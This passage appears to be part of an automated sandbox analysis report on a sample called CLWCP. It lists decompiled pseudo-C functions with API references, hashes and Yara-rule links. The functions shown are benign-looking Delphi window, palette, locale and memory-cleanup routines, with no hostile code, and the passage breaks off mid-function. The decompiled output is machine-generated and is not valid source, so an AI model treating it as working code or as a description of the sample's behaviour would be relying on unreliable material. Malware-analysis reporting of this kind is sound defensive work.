                                  • Opcode Fuzzy Hash: 944ef568eef76c73b7a802f34b7c54b463d944010535fe161b9c98e8645b4c76
                                  • Instruction Fuzzy Hash: FC115EA1705A49DBEEA0BF7A8906B5B37985F56728F44002BBC41DB393CE2CCC16865D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00455F48, Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00455F48(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x109) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x470664 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x74726f50
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x26c))) {
						L7:
						if(E004318A4(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0043BA58(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                  0x00455f48
                                  0x00455f4c
                                  0x00455f4e
                                  0x00455f50
                                  0x00455f52
                                  0x00455f5a
                                  0x00455ff9
                                  0x00455fff
                                  0x00455f6b
                                  0x00455f70
                                  0x00455f74
                                  0x00455fda
                                  0x00455ff7
                                  0x00455ff7
                                  0x00000000
                                  0x00455fda
                                  0x00455f76
                                  0x00455f78
                                  0x00455f78
                                  0x00455f7d
                                  0x00455f98
                                  0x00455fa1
                                  0x00455f96
                                  0x00000000
                                  0x00455f96
                                  0x00455fa9
                                  0x00455fab
                                  0x00455fab
                                  0x00000000
                                  0x00455f87
                                  0x00455f8c
                                  0x00455fad
                                  0x00455fc6
                                  0x00455fc8
                                  0x00455fc8
                                  0x00000000
                                  0x00455fc6
                                  0x00455f7d

                                  APIs
                                  • GetCapture.USER32 ref: 00455F6B
                                  • SendMessageA.USER32(00000000,-0000BBEE,0046D588,?), ref: 00455FBF
                                  • GetWindowLongA.USER32 ref: 00455FCF
                                  • SendMessageA.USER32(00000000,-0000BBEE,0046D588,?), ref: 00455FEE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MessageSend$CaptureLongWindow
                                  • String ID:
                                  • API String ID: 1158686931-0
                                  • Opcode ID: 5f0c1b851fcf437cedb4f01f49ec5ef74a377aea664cb921dde8b8433e01b7dd
                                  • Instruction ID: cbb7f6c86aa1ac59baff1092f2a4a8e80393e24e77d09830cadcc1da95022b58
                                  • Opcode Fuzzy Hash: 5f0c1b851fcf437cedb4f01f49ec5ef74a377aea664cb921dde8b8433e01b7dd
                                  • Instruction Fuzzy Hash: 54114972204A099FD620BA5ACA50E7773DC9F1831AB10443AFE5AD3A43EA69E8144769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00423228, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00423228(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E00421AAC(_t22);
					}
					_t21 = E0041F3DC( *((intOrPtr*)(_t39 + 0x14)), 1 << ( *(_t39 + 0x3e) & 0x0000ffff));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L004066E4();
						_t21 = E0041ECD4(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L0040641C();
							_push(0xe);
							_push(_t38);
							L0040641C();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00406944();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                  0x00423228
                                  0x0042322c
                                  0x0042322e
                                  0x00423235
                                  0x0042324f
                                  0x00423255
                                  0x00423257
                                  0x00423257
                                  0x0042326e
                                  0x00423273
                                  0x00423275
                                  0x0042327a
                                  0x0042327c
                                  0x0042327e
                                  0x00423283
                                  0x00423288
                                  0x0042328e
                                  0x004232b7
                                  0x004232b7
                                  0x00423290
                                  0x00423290
                                  0x00423292
                                  0x00423293
                                  0x0042329a
                                  0x0042329c
                                  0x0042329d
                                  0x004232a2
                                  0x004232ad
                                  0x004232b1
                                  0x00000000
                                  0x004232b3
                                  0x004232b3
                                  0x004232b3
                                  0x004232b1
                                  0x004232b9
                                  0x004232be
                                  0x004232c1
                                  0x004232c6
                                  0x004232c6
                                  0x004232c9
                                  0x004232ca
                                  0x004232cc
                                  0x004232d5
                                  0x004232d7
                                  0x00000000
                                  0x004232d7
                                  0x004232d5
                                  0x0042327a
                                  0x004232df

                                  APIs
                                  • 72E7AC50.USER32(00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042327E
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 00423293
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042329D
                                  • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232C1
                                  • 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232CC
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380CreateHalftonePalette
                                  • String ID:
                                  • API String ID: 178651289-0
                                  • Opcode ID: 6e854ed13ed71c2a628e380240294d06c5e954e1823b62f5478c796d6493dab5
                                  • Instruction ID: 05c5498da4ef81f9551387c9fed782a2be801edae81ddbf7dfda4d063f5beb4d
                                  • Opcode Fuzzy Hash: 6e854ed13ed71c2a628e380240294d06c5e954e1823b62f5478c796d6493dab5
                                  • Instruction Fuzzy Hash: 6111E42070027D9AEB20DF2698417EE36E1BF51356F400067FC009A6C1D3BC9994C3B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00453174, Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00453174(void* __eax) {
				void* _t16;
				void* _t36;
				void* _t37;
				signed int _t39;

				_t16 = __eax;
				_t37 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x46ef40 != 0) {
					_t16 = E0043BD58(__eax);
					if(_t16 != 0) {
						_t39 = GetWindowLongA(E0043BA58(_t37), 0xffffffec);
						if( *(_t37 + 0x2f8) != 0 ||  *(_t37 + 0x320) != 0) {
							if((_t39 & 0x00080000) == 0) {
								SetWindowLongA(E0043BA58(_t37), 0xffffffec, _t39 | 0x00080000);
							}
							return  *0x46ef40(E0043BA58(_t37),  *((intOrPtr*)(_t37 + 0x324)),  *(_t37 + 0x2f9) & 0x000000ff,  *(0x46efc8 + ( *(_t37 + 0x2f8) & 0x000000ff) * 4) |  *(0x46efd0 + ( *(_t37 + 0x320) & 0x000000ff) * 4));
						} else {
							SetWindowLongA(E0043BA58(_t37), 0xffffffec, _t39 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t36 = E0043BA58(_t37);
							_push(_t36);
							L0040691C();
							return _t36;
						}
					}
				}
				return _t16;
			}







                                  0x00453174
                                  0x00453176
                                  0x0045317c
                                  0x00453191
                                  0x00453198
                                  0x004531ad
                                  0x004531b6
                                  0x004531c7
                                  0x004531da
                                  0x004531da
                                  0x00000000
                                  0x0045321b
                                  0x0045322c
                                  0x00453231
                                  0x00453236
                                  0x00453238
                                  0x0045323c
                                  0x00453241
                                  0x00453242
                                  0x00000000
                                  0x00453242
                                  0x004531b6
                                  0x00453198
                                  0x00453249

                                  APIs
                                  • GetWindowLongA.USER32 ref: 004531A8
                                  • SetWindowLongA.USER32 ref: 004531DA
                                  • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,00450A2C), ref: 00453213
                                  • SetWindowLongA.USER32 ref: 0045322C
                                  • 72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,00450A2C), ref: 00453242
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$Long$AttributesB330Layered
                                  • String ID:
                                  • API String ID: 1770052509-0
                                  • Opcode ID: 46af30b256d10928f437a375ba999643719cd7d125cefb34eec97b120bcdc70a
                                  • Instruction ID: 3a13c55cf621c012d4a2d550bd8b4b19c68f6e4fc2cde6b4230db6698efac5e2
                                  • Opcode Fuzzy Hash: 46af30b256d10928f437a375ba999643719cd7d125cefb34eec97b120bcdc70a
                                  • Instruction Fuzzy Hash: F011E760A4069426CB10BF7A4C49F5726CC4B05356F0825BBBEA1EA2D7C77CCA08C76C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F344, Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E0041F344(intOrPtr __eax) {
				signed int _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x470898 == 0) {
					return _v5 & 0x000000ff;
				} else {
					_push(0);
					L004066E4();
					_v12 = __eax;
					_push(_t32);
					_push(0x41f3ca);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L0040641C();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x470898; // 0xad0807a3
						_push(_t18);
						L00406444();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x470898; // 0xad0807a3
						_push(_t21);
						L00406444();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x41f3d1);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00406944();
					return _t16;
				}
			}













                                  0x0041f345
                                  0x0041f347
                                  0x0041f34d
                                  0x0041f358
                                  0x0041f3d9
                                  0x0041f35a
                                  0x0041f35a
                                  0x0041f35c
                                  0x0041f361
                                  0x0041f366
                                  0x0041f367
                                  0x0041f36c
                                  0x0041f36f
                                  0x0041f372
                                  0x0041f374
                                  0x0041f377
                                  0x0041f378
                                  0x0041f380
                                  0x0041f385
                                  0x0041f386
                                  0x0041f388
                                  0x0041f38a
                                  0x0041f38f
                                  0x0041f390
                                  0x0041f39d
                                  0x0041f39e
                                  0x0041f3a0
                                  0x0041f3a2
                                  0x0041f3a7
                                  0x0041f3a8
                                  0x0041f3ad
                                  0x0041f3ad
                                  0x0041f3b3
                                  0x0041f3b6
                                  0x0041f3b9
                                  0x0041f3be
                                  0x0041f3c1
                                  0x0041f3c2
                                  0x0041f3c4
                                  0x0041f3c9
                                  0x0041f3c9

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041F35C
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041F3CA,?,00000000), ref: 0041F378
                                  • 72E7AEA0.GDI32(AD0807A3,00000000,00000008,?,?,00000068,00000000,0041F3CA,?,00000000), ref: 0041F390
                                  • 72E7AEA0.GDI32(AD0807A3,00000008,00000008,?,AD0807A3,00000000,00000008,?,?,00000068,00000000,0041F3CA,?,00000000), ref: 0041F3A8
                                  • 72E7B380.USER32(00000000,?,0041F3D1,0041F3CA,?,00000000), ref: 0041F3C4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: 5cc94371afd07242a5cd37eb12ce28cad48156c70d0025018c65f4ef2f0e638c
                                  • Instruction ID: 408ce5b6f06ab2824a8670db9625c87be0020e604698115877b74bfe2a6c2a2d
                                  • Opcode Fuzzy Hash: 5cc94371afd07242a5cd37eb12ce28cad48156c70d0025018c65f4ef2f0e638c
                                  • Instruction Fuzzy Hash: 63112B71548308BEFB40EBA59C42FAD77E8E704704F514077F908DA1C1D97A9494C72D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401AE2, Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00401AE2() {
				void* _t2;
				void* _t4;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4705c0 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401BBB);
					_push( *[fs:eax]);
					 *[fs:eax] = _t28;
					if( *0x470049 != 0) {
						_push(0x4705c8);
						L00401370();
					}
					 *0x4705c0 = 0;
					_t4 =  *0x470620; // 0x0
					LocalFree(_t4);
					 *0x470620 = 0;
					_t20 =  *0x4705e8; // 0x4705e8
					while(_t20 != 0x4705e8) {
						_t1 = _t20 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000); // executed
						_t20 =  *_t20;
					}
					E004013D8(0x4705e8);
					E004013D8(0x4705f8);
					E004013D8(0x470624);
					_t21 =  *0x4705e0; // 0x0
					while(_t21 != 0) {
						 *0x4705e0 =  *_t21;
						LocalFree(_t21);
						_t21 =  *0x4705e0; // 0x0
					}
					_pop(_t24);
					 *[fs:eax] = _t24;
					_push(0x401bc2);
					if( *0x470049 != 0) {
						_push(0x4705c8);
						L00401378();
					}
					_push(0x4705c8);
					L00401380();
					return 0;
				}
			}










                                  0x00401ae5
                                  0x00401aef
                                  0x00401bc4
                                  0x00401af5
                                  0x00401af7
                                  0x00401af8
                                  0x00401afd
                                  0x00401b00
                                  0x00401b0a
                                  0x00401b0c
                                  0x00401b11
                                  0x00401b11
                                  0x00401b16
                                  0x00401b1d
                                  0x00401b23
                                  0x00401b2a
                                  0x00401b2f
                                  0x00401b49
                                  0x00401b3e
                                  0x00401b42
                                  0x00401b47
                                  0x00401b47
                                  0x00401b56
                                  0x00401b60
                                  0x00401b6a
                                  0x00401b6f
                                  0x00401b77
                                  0x00401b7b
                                  0x00401b81
                                  0x00401b86
                                  0x00401b8c
                                  0x00401b92
                                  0x00401b95
                                  0x00401b98
                                  0x00401ba4
                                  0x00401ba6
                                  0x00401bab
                                  0x00401bab
                                  0x00401bb0
                                  0x00401bb5
                                  0x00401bba
                                  0x00401bba

                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(Function_000705C8,00000000,00401BBB), ref: 00401B11
                                  • LocalFree.KERNEL32(00000000,00000000,00401BBB), ref: 00401B23
                                  • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401BBB), ref: 00401B81
                                  • RtlLeaveCriticalSection.KERNEL32(Function_000705C8,00401BC2,00000000,00000000,00401BBB), ref: 00401BAB
                                  • RtlDeleteCriticalSection.KERNEL32(Function_000705C8,00401BC2,00000000,00000000,00401BBB), ref: 00401BB5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalSection$FreeLocal$DeleteEnterLeave
                                  • String ID:
                                  • API String ID: 3902855382-0
                                  • Opcode ID: 48ee725851277193807bdf0938f6986b267f5597e0e8a36e4393d27bd0db0dad
                                  • Instruction ID: dd12b175061bed6b72c62c504acc70ab66a8c779eff7002d0090a30e7966d8d3
                                  • Opcode Fuzzy Hash: 48ee725851277193807bdf0938f6986b267f5597e0e8a36e4393d27bd0db0dad
                                  • Instruction Fuzzy Hash: 56117770202740EEE351EB759851F3A36E4E346744F44447BF808E66F2E77C68948B1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B2F4, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E0040B2F4(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40b38b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040B068(GetThreadLocale(), 0x40b3a0, 0x100b,  &_v8);
				_t29 = E004081CC(0x40b3a0, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040B240, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x470770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040B27C, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040B392);
				return E0040411C( &_v8);
			}










                                  0x0040b2f4
                                  0x0040b2f7
                                  0x0040b2fc
                                  0x0040b2fd
                                  0x0040b302
                                  0x0040b305
                                  0x0040b31b
                                  0x0040b32d
                                  0x0040b337
                                  0x0040b347
                                  0x0040b34c
                                  0x0040b351
                                  0x0040b356
                                  0x0040b356
                                  0x0040b35c
                                  0x0040b35f
                                  0x0040b35f
                                  0x0040b370
                                  0x0040b370
                                  0x0040b377
                                  0x0040b37a
                                  0x0040b37d
                                  0x0040b38a

                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040B38B,?,?,00000000), ref: 0040B30C
                                    • Part of subcall function 0040B068: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B086
                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040B38B,?,?,00000000), ref: 0040B33C
                                  • EnumCalendarInfoA.KERNEL32(Function_0000B240,00000000,00000000,00000004), ref: 0040B347
                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040B38B,?,?,00000000), ref: 0040B365
                                  • EnumCalendarInfoA.KERNEL32(Function_0000B27C,00000000,00000000,00000003), ref: 0040B370
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread$CalendarEnum
                                  • String ID:
                                  • API String ID: 4102113445-0
                                  • Opcode ID: 1a89d55a44ce401da377dd60727b147840757dd13d4b5760ad4393d30002e4ba
                                  • Instruction ID: 28b47b87a12a2f32c5302e84a0ad6bb1544b038fd0184ab3c0a089a6ca06129f
                                  • Opcode Fuzzy Hash: 1a89d55a44ce401da377dd60727b147840757dd13d4b5760ad4393d30002e4ba
                                  • Instruction Fuzzy Hash: FF01DF31240604BAE301B6719C13F5F7658DB46B18F7289BAF901BA6D2E73D9E0082EC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004548A0, Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004548A0() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x470b58 != 0) {
					_t10 =  *0x470b58; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x470b58 = 0;
				if( *0x470b5c != 0) {
					_t2 =  *0x470b54; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x470b50) {
						_t8 =  *0x470b5c; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x470b5c; // 0x0
					CloseHandle(_t5);
					 *0x470b5c = 0;
					return 0;
				}
				return 0;
			}







                                  0x004548a7
                                  0x004548a9
                                  0x004548af
                                  0x004548af
                                  0x004548b6
                                  0x004548c2
                                  0x004548c4
                                  0x004548ca
                                  0x004548da
                                  0x004548de
                                  0x004548e4
                                  0x004548e4
                                  0x004548e9
                                  0x004548ef
                                  0x004548f6
                                  0x00000000
                                  0x004548f6
                                  0x004548fb

                                  APIs
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 004548AF
                                  • SetEvent.KERNEL32(00000000,004572BA,00000000,0045602B,?,?,0046D588,00000001,004561F1,?,00000000,00000000,00000000,00000001), ref: 004548CA
                                  • GetCurrentThreadId.KERNEL32 ref: 004548CF
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,004572BA,00000000,0045602B,?,?,0046D588,00000001,004561F1,?,00000000,00000000,00000000,00000001), ref: 004548E4
                                  • CloseHandle.KERNEL32(00000000,00000000,004572BA,00000000,0045602B,?,?,0046D588,00000001,004561F1,?,00000000,00000000,00000000,00000001), ref: 004548EF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                  • String ID:
                                  • API String ID: 2429646606-0
                                  • Opcode ID: 5967a147c784134102ea08d2c72e70a935c400af97a33273f65cc66d8d33174d
                                  • Instruction ID: ea1422286a5aaf1ad6debeb8b6b68ba5197bd7197b5f5b6af5719e73bb46d06f
                                  • Opcode Fuzzy Hash: 5967a147c784134102ea08d2c72e70a935c400af97a33273f65cc66d8d33174d
                                  • Instruction Fuzzy Hash: 30F01C74602280DEC650FBF9DC89A0533A5A70430DB1004BAB019FB2E2C63CF6D4CB2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045753C, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 282COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0045753C(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				int _v60;
				int _v64;
				intOrPtr _v68;
				char _v72;
				int _v76;
				char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				struct tagPOINT _v96;
				char _v97;
				struct tagRECT _v113;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t131;
				void* _t145;
				struct HWND__* _t167;
				intOrPtr _t188;
				char _t194;
				intOrPtr _t218;
				intOrPtr _t222;
				void* _t238;
				intOrPtr* _t250;
				intOrPtr _t269;
				intOrPtr _t271;
				intOrPtr _t276;
				struct tagRECT* _t298;
				intOrPtr* _t302;
				intOrPtr _t303;
				void* _t310;

				_t309 = _t310;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t251 = 0;
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t268 =  *0x44c2e4; // 0x44c2e8
				E00404A88( &_v72, _t268);
				_t250 =  &_v8;
				_push(_t310);
				_push(0x4578c3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t310 + 0xffffff70;
				 *((char*)( *_t250 + 0x58)) = 0;
				_v24 = 0;
				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E0044C6E0() == 0) {
					L23:
					_t131 = _v24;
					__eflags = _t131;
					if(_t131 <= 0) {
						E0045729C( *_t250, _t251, _t268);
					} else {
						E00457064( *_t250, 0, _t131);
					}
					goto L26;
				} else {
					_t145 = E00454718(E0043334C( &_v80, 1));
					_t268 =  *_t250;
					if(_t145 !=  *((intOrPtr*)( *_t250 + 0x60))) {
						goto L23;
					} else {
						_v72 =  *((intOrPtr*)( *_t250 + 0x60));
						_v64 = _v80;
						_v60 = _v76;
						_v60 = _v60 + E004572D4(__fp0);
						_v56 = E00453A88();
						_v52 =  *((intOrPtr*)( *_t250 + 0x5c));
						E0043452C( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
						_t298 =  &_v48;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
						_v96.x = 0;
						_v96.y = 0;
						_t302 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
						_t316 = _t302;
						if(_t302 == 0) {
							_t303 =  *((intOrPtr*)( *_t250 + 0x60));
							_t276 =  *0x4309d0; // 0x430a1c
							_t167 = E00403524(_t303, _t276);
							__eflags = _t167;
							if(_t167 != 0) {
								__eflags =  *(_t303 + 0x198);
								if( *(_t303 + 0x198) != 0) {
									ClientToScreen( *(_t303 + 0x198),  &_v96);
								}
							}
						} else {
							 *((intOrPtr*)( *_t302 + 0x40))();
						}
						OffsetRect( &_v48, _v96.x - _v88, _v96.y - _v84);
						E004346D0( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v80);
						_v32 = _v140;
						_v28 = _v136;
						E004546E0( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
						E00431AE4(_v148,  &_v140,  &_v144, _t316);
						E004041B4( &_v16, _v144);
						_v20 =  *((intOrPtr*)( *_t250 + 0x74));
						_t188 =  *0x46ef3c; // 0x4310a8
						_v68 = _t188;
						_v12 = 0;
						_t251 = 0;
